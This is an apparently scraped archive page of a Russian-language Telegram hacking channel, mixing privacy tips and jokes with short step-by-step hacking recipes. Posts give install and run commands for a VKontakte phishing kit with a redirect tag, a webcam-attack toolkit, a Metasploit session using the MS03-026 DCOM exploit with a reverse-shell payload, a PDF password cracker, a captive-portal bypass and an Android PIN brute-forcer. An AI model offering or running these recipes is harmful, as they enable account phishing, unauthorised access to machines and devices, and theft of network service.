en
Feedback
Dark Color 2.0

Dark Color 2.0

Closed channel

Статьи по хакингу,защите информации, а также новости в мире IB и многое другое. Связь - @darkclrbot Ссылка на каналы: @darkcolor Вся информация предоставлена в целях обучения и осведомления. Мы никого не призываем к неправомерным поступкам.

Show more
1 542
Subscribers
No data24 hours
+17 days
-2530 days
Posts Archive
​​OSINT в термукс OSINT (англ. Open source intelligence)– сбор информации и анализ разведданных на основании открытых источников Опции: Сканирование инстаграм Сканирование номера телефона Поиск имени пользователя в социальных сетях Поиск в интернете Установка: ▪️pkg upgrade ▪️pkg install git python ▪️git clone https://github.com/Deadshot0x7/007-TheBond ▪️cd 007-TheBond ▪️python -m venv venv ▪️source venv/bin/activate ▪️./setup.sh Запуск: ▪️python 007-TheBond.py Далее вам необходимо выбрать опцию, которые написаны выше, и заполнить форму, а дальше ждать результатов. #osint #Termux

Откажитесь от bestchange кто юзает ещё их сервис.
Откажитесь от bestchange кто юзает ещё их сервис.

У Вас работает Tor?
Anonymous voting

❗️Tor официально заблокирован в России В ответ на это разработчики выпустили обращение с призывом поднимать у себя серверы.

🙅🏼‍♂️В России начали блокировать Tor Это делают крупнейшие провайдеры и мобильные операторы
🙅🏼‍♂️В России начали блокировать Tor Это делают крупнейшие провайдеры и мобильные операторы

​​​Фишинг «Вконтакте» в Termux Robophishлучшая утилита для фишинга Вк. Установка: $ git clone https://github.com/gasayminajj/robophish $ cd robophish Переходим в HTML редатор и добавляем туда скрипт редиректа на наш сайт. <head> <meta http-equiv="refresh" content="1;URL=ссылка" /> </head> Запуск: $ bash robophish.sh #Termux

Infinity Search — метапоисковая система, ориентированная на приватность. Открытый исходный код. Работает так же, как DuckDuck
Infinity Search — метапоисковая система, ориентированная на приватность. Открытый исходный код. Работает так же, как DuckDuckGo. Он бесплатен и финансируется за счет рекламы без отслеживания и партнерских ссылок. #сайт #сервис

Системные команды Termux Часто пользователи #termux не предают значения этим командам, считая что они "бесполезные", но я, скажу вам, что данные команды могут пригодиться при оформлении вашего термукс терминала с нуля. ▪️date - вывести текущую дату и время ▪️cal - вывести календарь на текущий месяц ▪️uptime - показать текущее время ▪️whoami - имя, под которым вы в системе ▪️uname -a - показать информацию о ядре ▪️cat / proc / cpuinfo - информация ЦПУ ▪️cat / proc / meminfo - информация о памяти ▪️man command - показать мануал для command ▪️df - показать инф. о памяти дисков ▪️du - вывести« вес »текущего каталога ▪️free - использование памяти и swap ▪️whereis app - возможное расположение программы app ▪️which app - какое приложение будет запущено по умолчанию

​​​​​​Инструмент для массового тестирования вебкамер Entropy Toolkit — мощная утилита для пентестинга вебкамер. Может работать как "точечно", так и искать их через shodan. Установка $ pip install tailer $ git clone https://github.com/evildevill/entropy $ cd entropy $ chmod +x install.sh $ ./install.sh Использование $ python3 entropy -h https://github.com/evildevill/entropy #пенстест #полезное

Для обладателей Root-прав на устройстве❗️ Ни при каких обстоятельствах не обновляйте Magisk на крайнюю версию Canary (23010). Полно багов и жалоб. При попытке отката многие устройства уходят в ботлуп. При попытке удаления uninstaller'om слетает кастомное рекавери.

Metasploit: Framework C помощью которого вы сможете проникнуть, конечно же, в свой ПК. Установка и запуск: ▪️ pkg update ▪️ pkg install unstable-repo ▪️ pkg install metasploit ▪️ msfconsole ▪️ db_status ▪️ git init ▪️ use auxiliary/scanner/portscan/tcp ▪️set PORTS 1-5000 ▪️ set RHOSTS 192.168.88.161 ▪️ run ▪️ search dcom ▪️ use exploit/windows/dcerpc/ms03_026_dcom ▪️ set payload windows/shell_reverse_tcp ▪️ show options ▪️ set RHOSTS 192.168.88.161 (IP той машины, которую будем проверять на защищенность) ▪️ set LHOST 192.168.88.247 - IP злоумышленника ▪️ run ▪️ cd ..\..\ ▪️ echo Hello!

ButterCup — это кроссплатформенный менеджер паролей с открытым исходным кодом, написанный на NodeJS с Typescript. Использует
ButterCup — это кроссплатформенный менеджер паролей с открытым исходным кодом, написанный на NodeJS с Typescript. Использует AES256 шифрование для защиты ваших паролей и учетных данных в файлах хранилища. Хранилища можно загружать и сохранять в нескольких источниках, таких как локальная файловая система, Dropbox, Google Диск или любая служба с поддержкой WebDAV (например, ownCloud).

Взлом любого PDF-файла защищённого паролем Многие люди хранят на своих компьютерах конфиденциальную информацию, и они не хотят, чтобы она попала в чужие руки. Чтобы защитить эти данные, мы шифруем файлы, используя защищенный паролем формат PDF. На данный момент шифрование не так безопасно, как могло бы быть, потому что файлы PDF можно расшифровать. pdfcrack — продвинутый инструмент для взлома любых PDF-файлов, защищенных паролем . Очень простой в использовании скрипт, особенно для начинающих хакеров. Установка sudo apt-get update -y git clone https://github.com/machine1337/pdfcrack.git cd pdfcrack && chmod +x crack.sh sudo bash crack.sh После завершения проверки программа отобразит удобный интерфейс. Укажите путь к зашифрованному файл PDF, и выберите тип атаки и с хорошим словарем вы можете получить пароль от PDF файла ✌️

Халявный Wi-Fi. В повседневной жизни мы часто сталкиваемся с ситуацией, когда необходимо получить доступ в интернет. В кафе,
Халявный Wi-Fi. В повседневной жизни мы часто сталкиваемся с ситуацией, когда необходимо получить доступ в интернет. В кафе, ресторане или в общественном месте всегда можно найти точку доступа. Нередко попадаются роутеры с «гостевым доступом». Но бывает, что бесплатный Wi-Fi защищен Captive Portal. Иными словами, имеется открытая сеть Wi-Fi, к которой можно подключиться без пароля, но при попытке зайти на любой сайт, нас будет перебрасывать на страницу, где нужно ввести учётные данные, оплатить, подтвердить номер телефона с помощью СМС или что-то похожее. Но есть утилита для обхода данной фичи. Установка: ▪️apt update && apt upgrade -y ▪️apt -y install sipcalc nmap wget ▪️wget https://raw.githubusercontent.com/systematicat/hack-captive-portals/master/hack-captive.sh ▪️chmod u+x hack-captive.sh ▪️./hack-captive.sh После фразы "Pwned! Now you can surf the Internet!", вы можете спокойно пользоваться интернетом.

WhatsApp: «Мы в курсе, что некоторые пользователи испытывают трудности с WhatsApp в настоящий момент. Мы работаем над тем, чт
WhatsApp: «Мы в курсе, что некоторые пользователи испытывают трудности с WhatsApp в настоящий момент. Мы работаем над тем, чтоб вернуть все в норму и сразу же вас проинформируем. Спасибо за терпение!» Даниэль: «Telegram, у тебя кто-нибудь есть?» Telegram: «Приходи. Сервера работают, а родителей нет дома» 🤣🤣🤣🤣🤣

​​Как ограничить сбор данных у приложений Практически каждое приложение для Android отправляет различную информацию для осуществления сбора данных о пользователе. Если это никак не контролировать, то приложение будет делать это бесконечно. Приложение Tracker Control может ограничить права сторонних программ. Работает оно при помощи модуля VPN. Установите приложение и ограничьте права у установленных программ. Например, можно запретить выход в сеть. Также, программа обнаруживает трекеры в коде приложений и может ограничить их работу, если включить соответствующую функцию. #приватность #android

Что лучше? 🤔
Anonymous voting

Файл hosts.txt В операционных системах существует адресация серверов, которая работает поверх DNS. Это позволяет администратору устройства выставлять свою адресацию необходимых узлов. Файл hosts содержит адреса и параметры для определения источника. Когда компьютер обращается к DNS серверу, адреса файла hosts имеют приоритет, потому адресация будет выполнена согласно локальным указаниям. Это позволяет формировать собственную сеть, блокировать нежелательные сайты, а также ограничивать приложениям доступ в интернет. Например, если они пиратские. Многие системы взлома программного обеспечения вносят адреса серверов проверки подлинности ПО в файл hosts. Как пользоваться В системах Windows файл hosts.txt находится в %SystemRoot%\system32\drivers\etc\hosts. Его формат представляет собой текстовый файл, в котором хранятся парные адреса. Первый — к которому обращаемся, второй — куда перенаправляем. Если вы хотите заблокировать адрес, достаточно перенаправить его на 0.0.0.0. #ликбез

Взламываем пароль на Android-смартфоне с помощью брутфорс-атаки Перед вами отличная возможность разблокировать устройство Android путём подбора PIN-кода на заблокированном экране. Превратите свой телефон Kali Nethunter во взломщик PIN-кодов для устройств Android! Android-PIN-Bruteforce использует кабель USB OTG для подключения заблокированного телефона к устройству Nethunter. Он имитирует клавиатуру, автоматически пробует ПИН-коды и ждёт после того, как попробует слишком много неправильных догадок. https://github.com/urbanadventurer/Android-PIN-Bruteforce

Как обманывают системы распознавания лиц Подобные системы получаю повсеместное внедрение, и многие злоумышленники находят нов
+1
Как обманывают системы распознавания лиц Подобные системы получаю повсеместное внедрение, и многие злоумышленники находят новые и новые способы защиты от них. Для некоторых даже не нужно скрывать лицо. Часть из них базируется на видоизменение лица, например, с помощью масок с глазами ниже обычных. Это уже не распознается как лицо. Другая же часть базируется на переизбытке информации, когда лиц много, понять какое из них настоящее тоже невозможно. Смотрите прикрепленные фотографии. Система не интуитивна и еще не идеальна, а потому обмануть ее достаточно просто. Существуют также девайсы, создающие инфракрасное излучение перед лицом. Мы его не видим, однако, камеры видят и никак не могут разглядеть человека за ним.